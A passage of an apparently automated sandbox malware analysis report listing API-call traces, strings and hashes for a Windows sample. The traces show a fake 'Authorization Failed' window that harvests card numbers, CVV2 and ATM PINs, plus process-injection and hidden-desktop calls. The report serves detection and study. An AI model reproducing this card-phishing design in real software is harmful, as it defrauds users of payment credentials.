                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: "%s"$"%s"$"%s"$"POS$"edi$"edi$"edi$"sub$"sub$%i]$%i] $'%s%$'%s'$'%s'$'%s'$'%s'$''>$''>$A$A
                            • API String ID: 0-792900420
                            • Opcode ID: 44a1de5bb6308ec8297fddabfebab828391f15ae462822a30ca388360e9e3fc0
                            • Instruction ID: 591e24e94baa5eb777a4e5272106f1456da37870eb4cc5cdaf26395a7f99a22d
                            • Opcode Fuzzy Hash: 44a1de5bb6308ec8297fddabfebab828391f15ae462822a30ca388360e9e3fc0
                            • Instruction Fuzzy Hash: 43B224A264D7E41ECB178B306BEA15A7F71AA2331079D41CFC4C18B5B3D24C9A46D39E
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            • Opcode ID: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction ID: 282a6fb7077f79b337956a50597d570250b08ff90f4541f666399335e01d3b83
                            • Opcode Fuzzy Hash: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction Fuzzy Hash: 2C018471B442006FDB14B73E9C5276FA6D95BC0314F64403BA602F72D0E9B899018A5D
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                            • {9BA05972-F6A8-11CF-A442-00A0C90A8F39}, xrefs: 004017D5
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            • Opcode ID: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction ID: 52c0c8d8f8a1b88d6522b4dea913535513547713cd70a2aa0dd21656c7656eb5
                            • Opcode Fuzzy Hash: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction Fuzzy Hash: E1118673B102116FE710FEF5DC81BAB7AE89B00355F10483BE644F32D1E6B8A50286B9
                            APIs
                            • CreateFileA.KERNEL32(00408020,80000000,00000000,00000000,?,00000000,00000000), ref: 004012CB
                            • ReadFile.KERNEL32(00000000,?,00014C08,?,00000000,00408020,80000000,00000000,00000000,?,00000000,00000000), ref: 004012F7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00014C08,?,00000000,00408020,80000000,00000000,00000000,?,00000000,00000000), ref: 004012FD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleRead
                            • String ID:
                            • API String ID: 1035965006-0
                            • Opcode ID: 47f2dca901cbdc1a66e3f3583fad0d6114902e6408f1b023f1e58de9c319e094
                            • Instruction ID: 9417908700fea3c6c2d518f569e6258f54968d851d27fbd2fc3a7524409ea189
                            • Opcode Fuzzy Hash: 47f2dca901cbdc1a66e3f3583fad0d6114902e6408f1b023f1e58de9c319e094
                            • Instruction Fuzzy Hash: 6301F972B4031467F66061B99C42FEA62DC9B40718F250573BA04F71E1D4F8F94145E9
                            APIs
                            • CreateFileA.KERNEL32(00408020,80000000,00000000,00000000,?,00000000,00000000), ref: 004012CB
                            • ReadFile.KERNEL32(00000000,?,00014C08,?,00000000,00408020,80000000,00000000,00000000,?,00000000,00000000), ref: 004012F7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00014C08,?,00000000,00408020,80000000,00000000,00000000,?,00000000,00000000), ref: 004012FD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleRead
                            • String ID:
                            • API String ID: 1035965006-0
                            • Opcode ID: a7034a66a97c2ad48dbde2790ce3c97ab3afce793421e3091bb9c8eae5f15450
                            • Instruction ID: 63f29cc0c8a63db554c35ce2faa1ceedf18d1a6f23da356bd246b66c6c3c2b62
                            • Opcode Fuzzy Hash: a7034a66a97c2ad48dbde2790ce3c97ab3afce793421e3091bb9c8eae5f15450
                            • Instruction Fuzzy Hash: 4DE04F22B8434036E120117A5C82F6955955B81B6CF39067BF251FA5E2D0E8A9064159
                            Strings
                            • browser window. THE ADDITIONA L TERMS CONTA IN A BINDING ARBITRA TION CLA USE A NDSoftware Assurance.into Order Management from other sources , xrefs: 00403B62
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: browser window. THE ADDITIONA L TERMS CONTA IN A BINDING ARBITRA TION CLA USE A NDSoftware Assurance.into Order Management from other sources
                            • API String ID: 0-4076998654
                            • Opcode ID: 71e30e22ed7aa17d5eb5796dfda6b7e5a97b13d87a54357e884cfde78ccb44a7
                            • Instruction ID: 40709d4487810cc1922a5993d5805e7f605537f13211522c88bb602fbf3c41e4
                            • Opcode Fuzzy Hash: 71e30e22ed7aa17d5eb5796dfda6b7e5a97b13d87a54357e884cfde78ccb44a7
                            • Instruction Fuzzy Hash: D411845AFCE1100AC7299C312855A76E9B9C363366F6EB5BA5441F3382CA38CD0A814C
                            Strings
                            • browser window. THE ADDITIONA L TERMS CONTA IN A BINDING ARBITRA TION CLA USE A NDSoftware Assurance.into Order Management from other sources , xrefs: 00403A22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: browser window. THE ADDITIONA L TERMS CONTA IN A BINDING ARBITRA TION CLA USE A NDSoftware Assurance.into Order Management from other sources
                            • API String ID: 0-4076998654
                            • Opcode ID: b39da473612083b458953393f7e89ebb2f0e779550c5cde06b9b03474c2cca4d
                            • Instruction ID: d5233873f3df390e9927d326a7b197e4f088e0b608a775f8c8ee362fb12e3d34
                            • Opcode Fuzzy Hash: b39da473612083b458953393f7e89ebb2f0e779550c5cde06b9b03474c2cca4d
                            • Instruction Fuzzy Hash: 85F0E559F9F204078B198C702481A77D87CC727366F65747A9492F7797DA28CD0A840D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • Opcode ID: 58f3c8a1f9e1281dbdf0148f17ab67f2c4c2117c77419a047376376c9843a203
                            • Instruction ID: 369b517bdf9b4a7eefb07a6653478fd64adda63123773171253af608eda399e9
                            • Opcode Fuzzy Hash: 58f3c8a1f9e1281dbdf0148f17ab67f2c4c2117c77419a047376376c9843a203
                            • Instruction Fuzzy Hash: DDE0BF22E9A1004BC7148E71D485A35F67CD767312F24F0758045B7252C334D906991C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • Opcode ID: 6b19ef757a3db7c08c54adf90fa78ded45087a2f29c5cc2a90648ea44554c268
                            • Instruction ID: 44b393219971a2e47edc40146be2bcda873f62d5454f9e9f1d1b61fb4f38130d
                            • Opcode Fuzzy Hash: 6b19ef757a3db7c08c54adf90fa78ded45087a2f29c5cc2a90648ea44554c268
                            • Instruction Fuzzy Hash: 9DE04622E9A2108FC7048E61C885A31F6B8D76B311F28F0B5C006BB262C3B8D847992C

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
